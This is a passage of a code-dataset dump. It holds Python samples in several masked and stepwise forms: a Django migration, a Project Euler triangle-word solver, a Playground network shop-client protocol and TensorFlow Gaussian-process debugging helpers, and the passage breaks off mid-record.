code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
---|---|---|---|
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('classroom', '0003_remove_anouncements_classroom')]
operations = [migrations.AddField(model_name='anouncements', name=
'classrm', field=models.ForeignKey(blank=True, null=True, on_delete
=django.db.models.deletion.CASCADE, related_name='anouncements', to
='classroom.Classroom'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [('classroom', '0003_remove_anouncements_classroom')]
operations = [migrations.AddField(model_name='anouncements', name=
'classrm', field=models.ForeignKey(blank=True, null=True, on_delete
=django.db.models.deletion.CASCADE, related_name='anouncements', to
='classroom.Classroom'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-05-22 00:19
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('classroom', '0003_remove_anouncements_classroom'),
]
operations = [
migrations.AddField(
model_name='anouncements',
name='classrm',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),
),
]
|
flexible
|
{
"blob_id": "e9659555938211d067919ee5e0083efb29d42d7b",
"index": 8600,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n dependencies = [('classroom', '0003_remove_anouncements_classroom')]\n operations = [migrations.AddField(model_name='anouncements', name=\n 'classrm', field=models.ForeignKey(blank=True, null=True, on_delete\n =django.db.models.deletion.CASCADE, related_name='anouncements', to\n ='classroom.Classroom'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-05-22 00:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('classroom', '0003_remove_anouncements_classroom'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='anouncements',\n name='classrm',\n field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='anouncements', to='classroom.Classroom'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def is_triangle_number(n):
root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
if root.is_integer():
return True
return False
def calculation():
count = 0
for word in string_list:
sum = 0
for char in word:
sum += char_dict[char]
if is_triangle_number(sum):
count += 1
print(count)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fin.close()
<|reserved_special_token_0|>
def is_triangle_number(n):
root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
if root.is_integer():
return True
return False
def calculation():
count = 0
for word in string_list:
sum = 0
for char in word:
sum += char_dict[char]
if is_triangle_number(sum):
count += 1
print(count)
calculation()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
fin = open(
'D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt'
, 'r')
string_content = fin.readline()
fin.close()
char_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,
'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,
'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,
'Y': 25, 'Z': 26}
string_list = list()
string_list = string_content.replace('"', '').split(',')
def is_triangle_number(n):
root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
if root.is_integer():
return True
return False
def calculation():
count = 0
for word in string_list:
sum = 0
for char in word:
sum += char_dict[char]
if is_triangle_number(sum):
count += 1
print(count)
calculation()
<|reserved_special_token_1|>
import math
import time
fin = open(
'D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt'
, 'r')
string_content = fin.readline()
fin.close()
char_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,
'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,
'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,
'Y': 25, 'Z': 26}
string_list = list()
string_list = string_content.replace('"', '').split(',')
def is_triangle_number(n):
root = (-1 + math.sqrt(1 + 8.0 * n)) / 2
if root.is_integer():
return True
return False
def calculation():
count = 0
for word in string_list:
sum = 0
for char in word:
sum += char_dict[char]
if is_triangle_number(sum):
count += 1
print(count)
calculation()
<|reserved_special_token_1|>
# The nth term of the sequence of triangle numbers is given by, tn = ½n(n+1); so the first ten triangle numbers are:
# 1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...
# By converting each letter in a word to a number corresponding to its alphabetical position and adding these values we form a word value. For example, the word value for SKY is 19 + 11 + 25 = 55 = t10. If the word value is a triangle number then we shall call the word a triangle word.
# Using words.txt (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, how many are triangle words?
# ANSWER: 162
import math
import time
# Get Data
fin=open("D:\OneDrive\Study\Self learning\Coding\Project Euler\data\Problem 42\p042_words.txt","r")
string_content=fin.readline()
fin.close()
char_dict={"A":1,"B":2,"C":3,"D":4,"E":5,"F":6,"G":7,"H":8,"I":9,"J":10,"K":11,"L":12,"M":13, "N":14,"O":15,"P":16,"Q":17,"R":18,"S":19,"T":20,"U":21,"V":22,"W":23,"X":24,"Y":25,"Z":26}
# Split data into element of a list
string_list=list()
string_list=string_content.replace('"','').split(',')
# Check if it is tran
def is_triangle_number(n):
# Check if root is integer
root=(-1+math.sqrt(1+8.0*n))/2
if root.is_integer():
return True
return False
def calculation():
count=0
# For each word in string list
for word in string_list:
sum=0
# For each char in each word
for char in word:
sum += char_dict[char]
if is_triangle_number(sum):
count +=1
print(count)
calculation()
|
flexible
|
{
"blob_id": "61019a5439a6f0c1aee51db9b048a26fb9b5bf5d",
"index": 8257,
"step-1": "<mask token>\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\n<mask token>\n",
"step-2": "<mask token>\nfin.close()\n<mask token>\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-3": "<mask token>\nfin = open(\n 'D:\\\\OneDrive\\\\Study\\\\Self learning\\\\Coding\\\\Project Euler\\\\data\\\\Problem 42\\\\p042_words.txt'\n , 'r')\nstring_content = fin.readline()\nfin.close()\nchar_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,\n 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,\n 'Y': 25, 'Z': 26}\nstring_list = list()\nstring_list = string_content.replace('\"', '').split(',')\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-4": "import math\nimport time\nfin = open(\n 'D:\\\\OneDrive\\\\Study\\\\Self learning\\\\Coding\\\\Project Euler\\\\data\\\\Problem 42\\\\p042_words.txt'\n , 'r')\nstring_content = fin.readline()\nfin.close()\nchar_dict = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8,\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15, 'P': 16,\n 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, 'W': 23, 'X': 24,\n 'Y': 25, 'Z': 26}\nstring_list = list()\nstring_list = string_content.replace('\"', '').split(',')\n\n\ndef is_triangle_number(n):\n root = (-1 + math.sqrt(1 + 8.0 * n)) / 2\n if root.is_integer():\n return True\n return False\n\n\ndef calculation():\n count = 0\n for word in string_list:\n sum = 0\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count += 1\n print(count)\n\n\ncalculation()\n",
"step-5": "# The nth term of the sequence of triangle numbers is given by, tn = ½n(n+1); so the first ten triangle numbers are:\n# 1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n# By converting each letter in a word to a number corresponding to its alphabetical position and adding these values we form a word value. For example, the word value for SKY is 19 + 11 + 25 = 55 = t10. If the word value is a triangle number then we shall call the word a triangle word.\n# Using words.txt (right click and 'Save Link/Target As...'), a 16K text file containing nearly two-thousand common English words, how many are triangle words?\n# ANSWER: 162\n\nimport math\nimport time\n# Get Data\nfin=open(\"D:\\OneDrive\\Study\\Self learning\\Coding\\Project Euler\\data\\Problem 42\\p042_words.txt\",\"r\")\nstring_content=fin.readline()\nfin.close()\n\nchar_dict={\"A\":1,\"B\":2,\"C\":3,\"D\":4,\"E\":5,\"F\":6,\"G\":7,\"H\":8,\"I\":9,\"J\":10,\"K\":11,\"L\":12,\"M\":13, \"N\":14,\"O\":15,\"P\":16,\"Q\":17,\"R\":18,\"S\":19,\"T\":20,\"U\":21,\"V\":22,\"W\":23,\"X\":24,\"Y\":25,\"Z\":26}\n\n# Split data into element of a list\nstring_list=list()\nstring_list=string_content.replace('\"','').split(',')\n\n# Check if it is tran\ndef is_triangle_number(n):\n # Check if root is integer\n root=(-1+math.sqrt(1+8.0*n))/2\n if root.is_integer():\n return True\n return False \n\ndef calculation():\n count=0\n # For each word in string list\n for word in string_list:\n sum=0\n # For each char in each word\n for char in word:\n sum += char_dict[char]\n if is_triangle_number(sum):\n count +=1\n print(count)\ncalculation()\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
#self.loop = loop
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print("ShopClient connection_made is called\n")
self.transport = transport
# PACKET 1 - Request to Buy packet
startbuy = RequestToBuy()
print("Sending Request to Buy")
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print("ShopClient Data_received is called")
self.deserializer.update(data)
#print(data)
for pkt in self.deserializer.nextPackets():
#print("Client <------------{}------------- Server".format(pkt.DEFINITION_IDENTIFIER))
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
# PACKET 3 - Send Item packet
item = "Butter"
response = SendItem()
response.Item = item
print("Sent SendItem")
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
# PACKET 5 - Send Money packet
response = SendMoney()
response.Cash = pkt.Amount
print("Sent SendMoney")
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print("Client Received Incorrect Packet. Closing Connection. Try Again!")
self.transport.close()
def connection_lost(self,exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate():
#1
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
#logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
#logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector("passthrough", ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
|
normal
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def debug_inference(inference, dummy, entropy, cross_entropy,
expected_log_likelhood):
dummy = tf.Print(dummy, [entropy], 'entropy: ')
dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
dummy = tf.Print(dummy, [expected_log_likelhood],
'expected_log_likelhood: ')
return dummy
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def debug_inference(inference, dummy, entropy, cross_entropy,
expected_log_likelhood):
dummy = tf.Print(dummy, [entropy], 'entropy: ')
dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
dummy = tf.Print(dummy, [expected_log_likelhood],
'expected_log_likelhood: ')
return dummy
def matrix_conditions(session, inference):
for j in range(inference.num_latent):
k_j = inference.kern_f[j]
K_zz_f = k_j.kernel(inference.inducing_locations, inference.
inducing_locations, jitter=True)
mat = K_zz_f.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_j.sigma.eval(session=session)
ls = k_j.length_scales.eval(session=session)
print('MATRIX CONDITION F(' + str(j) + '): ', cond)
print('SIGMA F(' + str(j) + '): ', sigma)
print('LENGTH_SCALES F(' + str(j) + '): ', ls)
print(mat)
for j in range(inference.num_latent):
for i in range(inference.num_outputs):
k_ij = inference.kern_w[i][j]
K_zz_w = k_ij.kernel(inference.inducing_locations, inference.
inducing_locations, jitter=True)
mat = K_zz_w.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_ij.sigma.eval(session=session)
ls = k_ij.length_scales.eval(session=session)
print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)
print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)
print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)
print(mat)
<|reserved_special_token_1|>
import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy,
expected_log_likelhood):
dummy = tf.Print(dummy, [entropy], 'entropy: ')
dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
dummy = tf.Print(dummy, [expected_log_likelhood],
'expected_log_likelhood: ')
return dummy
def matrix_conditions(session, inference):
for j in range(inference.num_latent):
k_j = inference.kern_f[j]
K_zz_f = k_j.kernel(inference.inducing_locations, inference.
inducing_locations, jitter=True)
mat = K_zz_f.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_j.sigma.eval(session=session)
ls = k_j.length_scales.eval(session=session)
print('MATRIX CONDITION F(' + str(j) + '): ', cond)
print('SIGMA F(' + str(j) + '): ', sigma)
print('LENGTH_SCALES F(' + str(j) + '): ', ls)
print(mat)
for j in range(inference.num_latent):
for i in range(inference.num_outputs):
k_ij = inference.kern_w[i][j]
K_zz_w = k_ij.kernel(inference.inducing_locations, inference.
inducing_locations, jitter=True)
mat = K_zz_w.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_ij.sigma.eval(session=session)
ls = k_ij.length_scales.eval(session=session)
print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)
print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)
print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)
print(mat)
<|reserved_special_token_1|>
import numpy as np
import tensorflow as tf
import math
from .. import util
def debug_inference(inference, dummy, entropy, cross_entropy, expected_log_likelhood):
dummy = tf.Print(dummy, [entropy], 'entropy: ')
dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')
dummy = tf.Print(dummy, [expected_log_likelhood], 'expected_log_likelhood: ')
#dummy = tf.Print(dummy, [inference.q_means_u], 'self.q_means_u: ')
#dummy = tf.Print(dummy, [inference.q_covars_u], 'self.q_covars_u: ')
#dummy = tf.Print(dummy, [inference.q_means_v], 'self.q_means_v: ')
#dummy = tf.Print(dummy, [inference.q_covars_v], 'self.q_covars_v: ')
return dummy
def matrix_conditions(session, inference):
for j in range(inference.num_latent):
k_j = inference.kern_f[j]
K_zz_f = k_j.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
mat = K_zz_f.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_j.sigma.eval(session=session)
ls = k_j.length_scales.eval(session=session)
print('MATRIX CONDITION F('+str(j)+'): ', cond)
print('SIGMA F('+str(j)+'): ', sigma)
print('LENGTH_SCALES F('+str(j)+'): ', ls)
print(mat)
for j in range(inference.num_latent):
for i in range(inference.num_outputs):
k_ij = inference.kern_w[i][j]
K_zz_w = k_ij.kernel(inference.inducing_locations, inference.inducing_locations, jitter=True)
mat = K_zz_w.eval(session=session)
cond = np.linalg.cond(mat)
sigma = k_ij.sigma.eval(session=session)
ls = k_ij.length_scales.eval(session=session)
print('MATRIX CONDITION W('+str(i)+','+str(j)+'): ', cond)
print('SIGMA W('+str(i)+','+str(j)+'): ', sigma)
print('LENGTH_SCALES W('+str(i)+','+str(j)+'): ', ls)
print(mat)
|
flexible
|
{
"blob_id": "4758d6efde21e3b5d91f107188f24b6ddf7cbbe4",
"index": 7935,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef debug_inference(inference, dummy, entropy, cross_entropy,\n expected_log_likelhood):\n dummy = tf.Print(dummy, [entropy], 'entropy: ')\n dummy = tf.Print(dummy, [cross_entropy], 'cross_entropy: ')\n dummy = tf.Print(dummy, [expected_log_likelhood],\n 'expected_log_likelhood: ')\n return dummy\n\n\ndef matrix_conditions(session, inference):\n for j in range(inference.num_latent):\n k_j = inference.kern_f[j]\n K_zz_f = k_j.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_f.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_j.sigma.eval(session=session)\n ls = k_j.length_scales.eval(session=session)\n print('MATRIX CONDITION F(' + str(j) + '): ', cond)\n print('SIGMA F(' + str(j) + '): ', sigma)\n print('LENGTH_SCALES F(' + str(j) + '): ', ls)\n print(mat)\n for j in range(inference.num_latent):\n for i in range(inference.num_outputs):\n k_ij = inference.kern_w[i][j]\n K_zz_w = k_ij.kernel(inference.inducing_locations, inference.\n inducing_locations, jitter=True)\n mat = K_zz_w.eval(session=session)\n cond = np.linalg.cond(mat)\n sigma = k_ij.sigma.eval(session=session)\n ls = k_ij.length_scales.eval(session=session)\n print('MATRIX CONDITION W(' + str(i) + ',' + str(j) + '): ', cond)\n print('SIGMA W(' + str(i) + ',' + str(j) + '): ', sigma)\n print('LENGTH_SCALES W(' + str(i) + ',' + str(j) + '): ', ls)\n print(mat)\n",
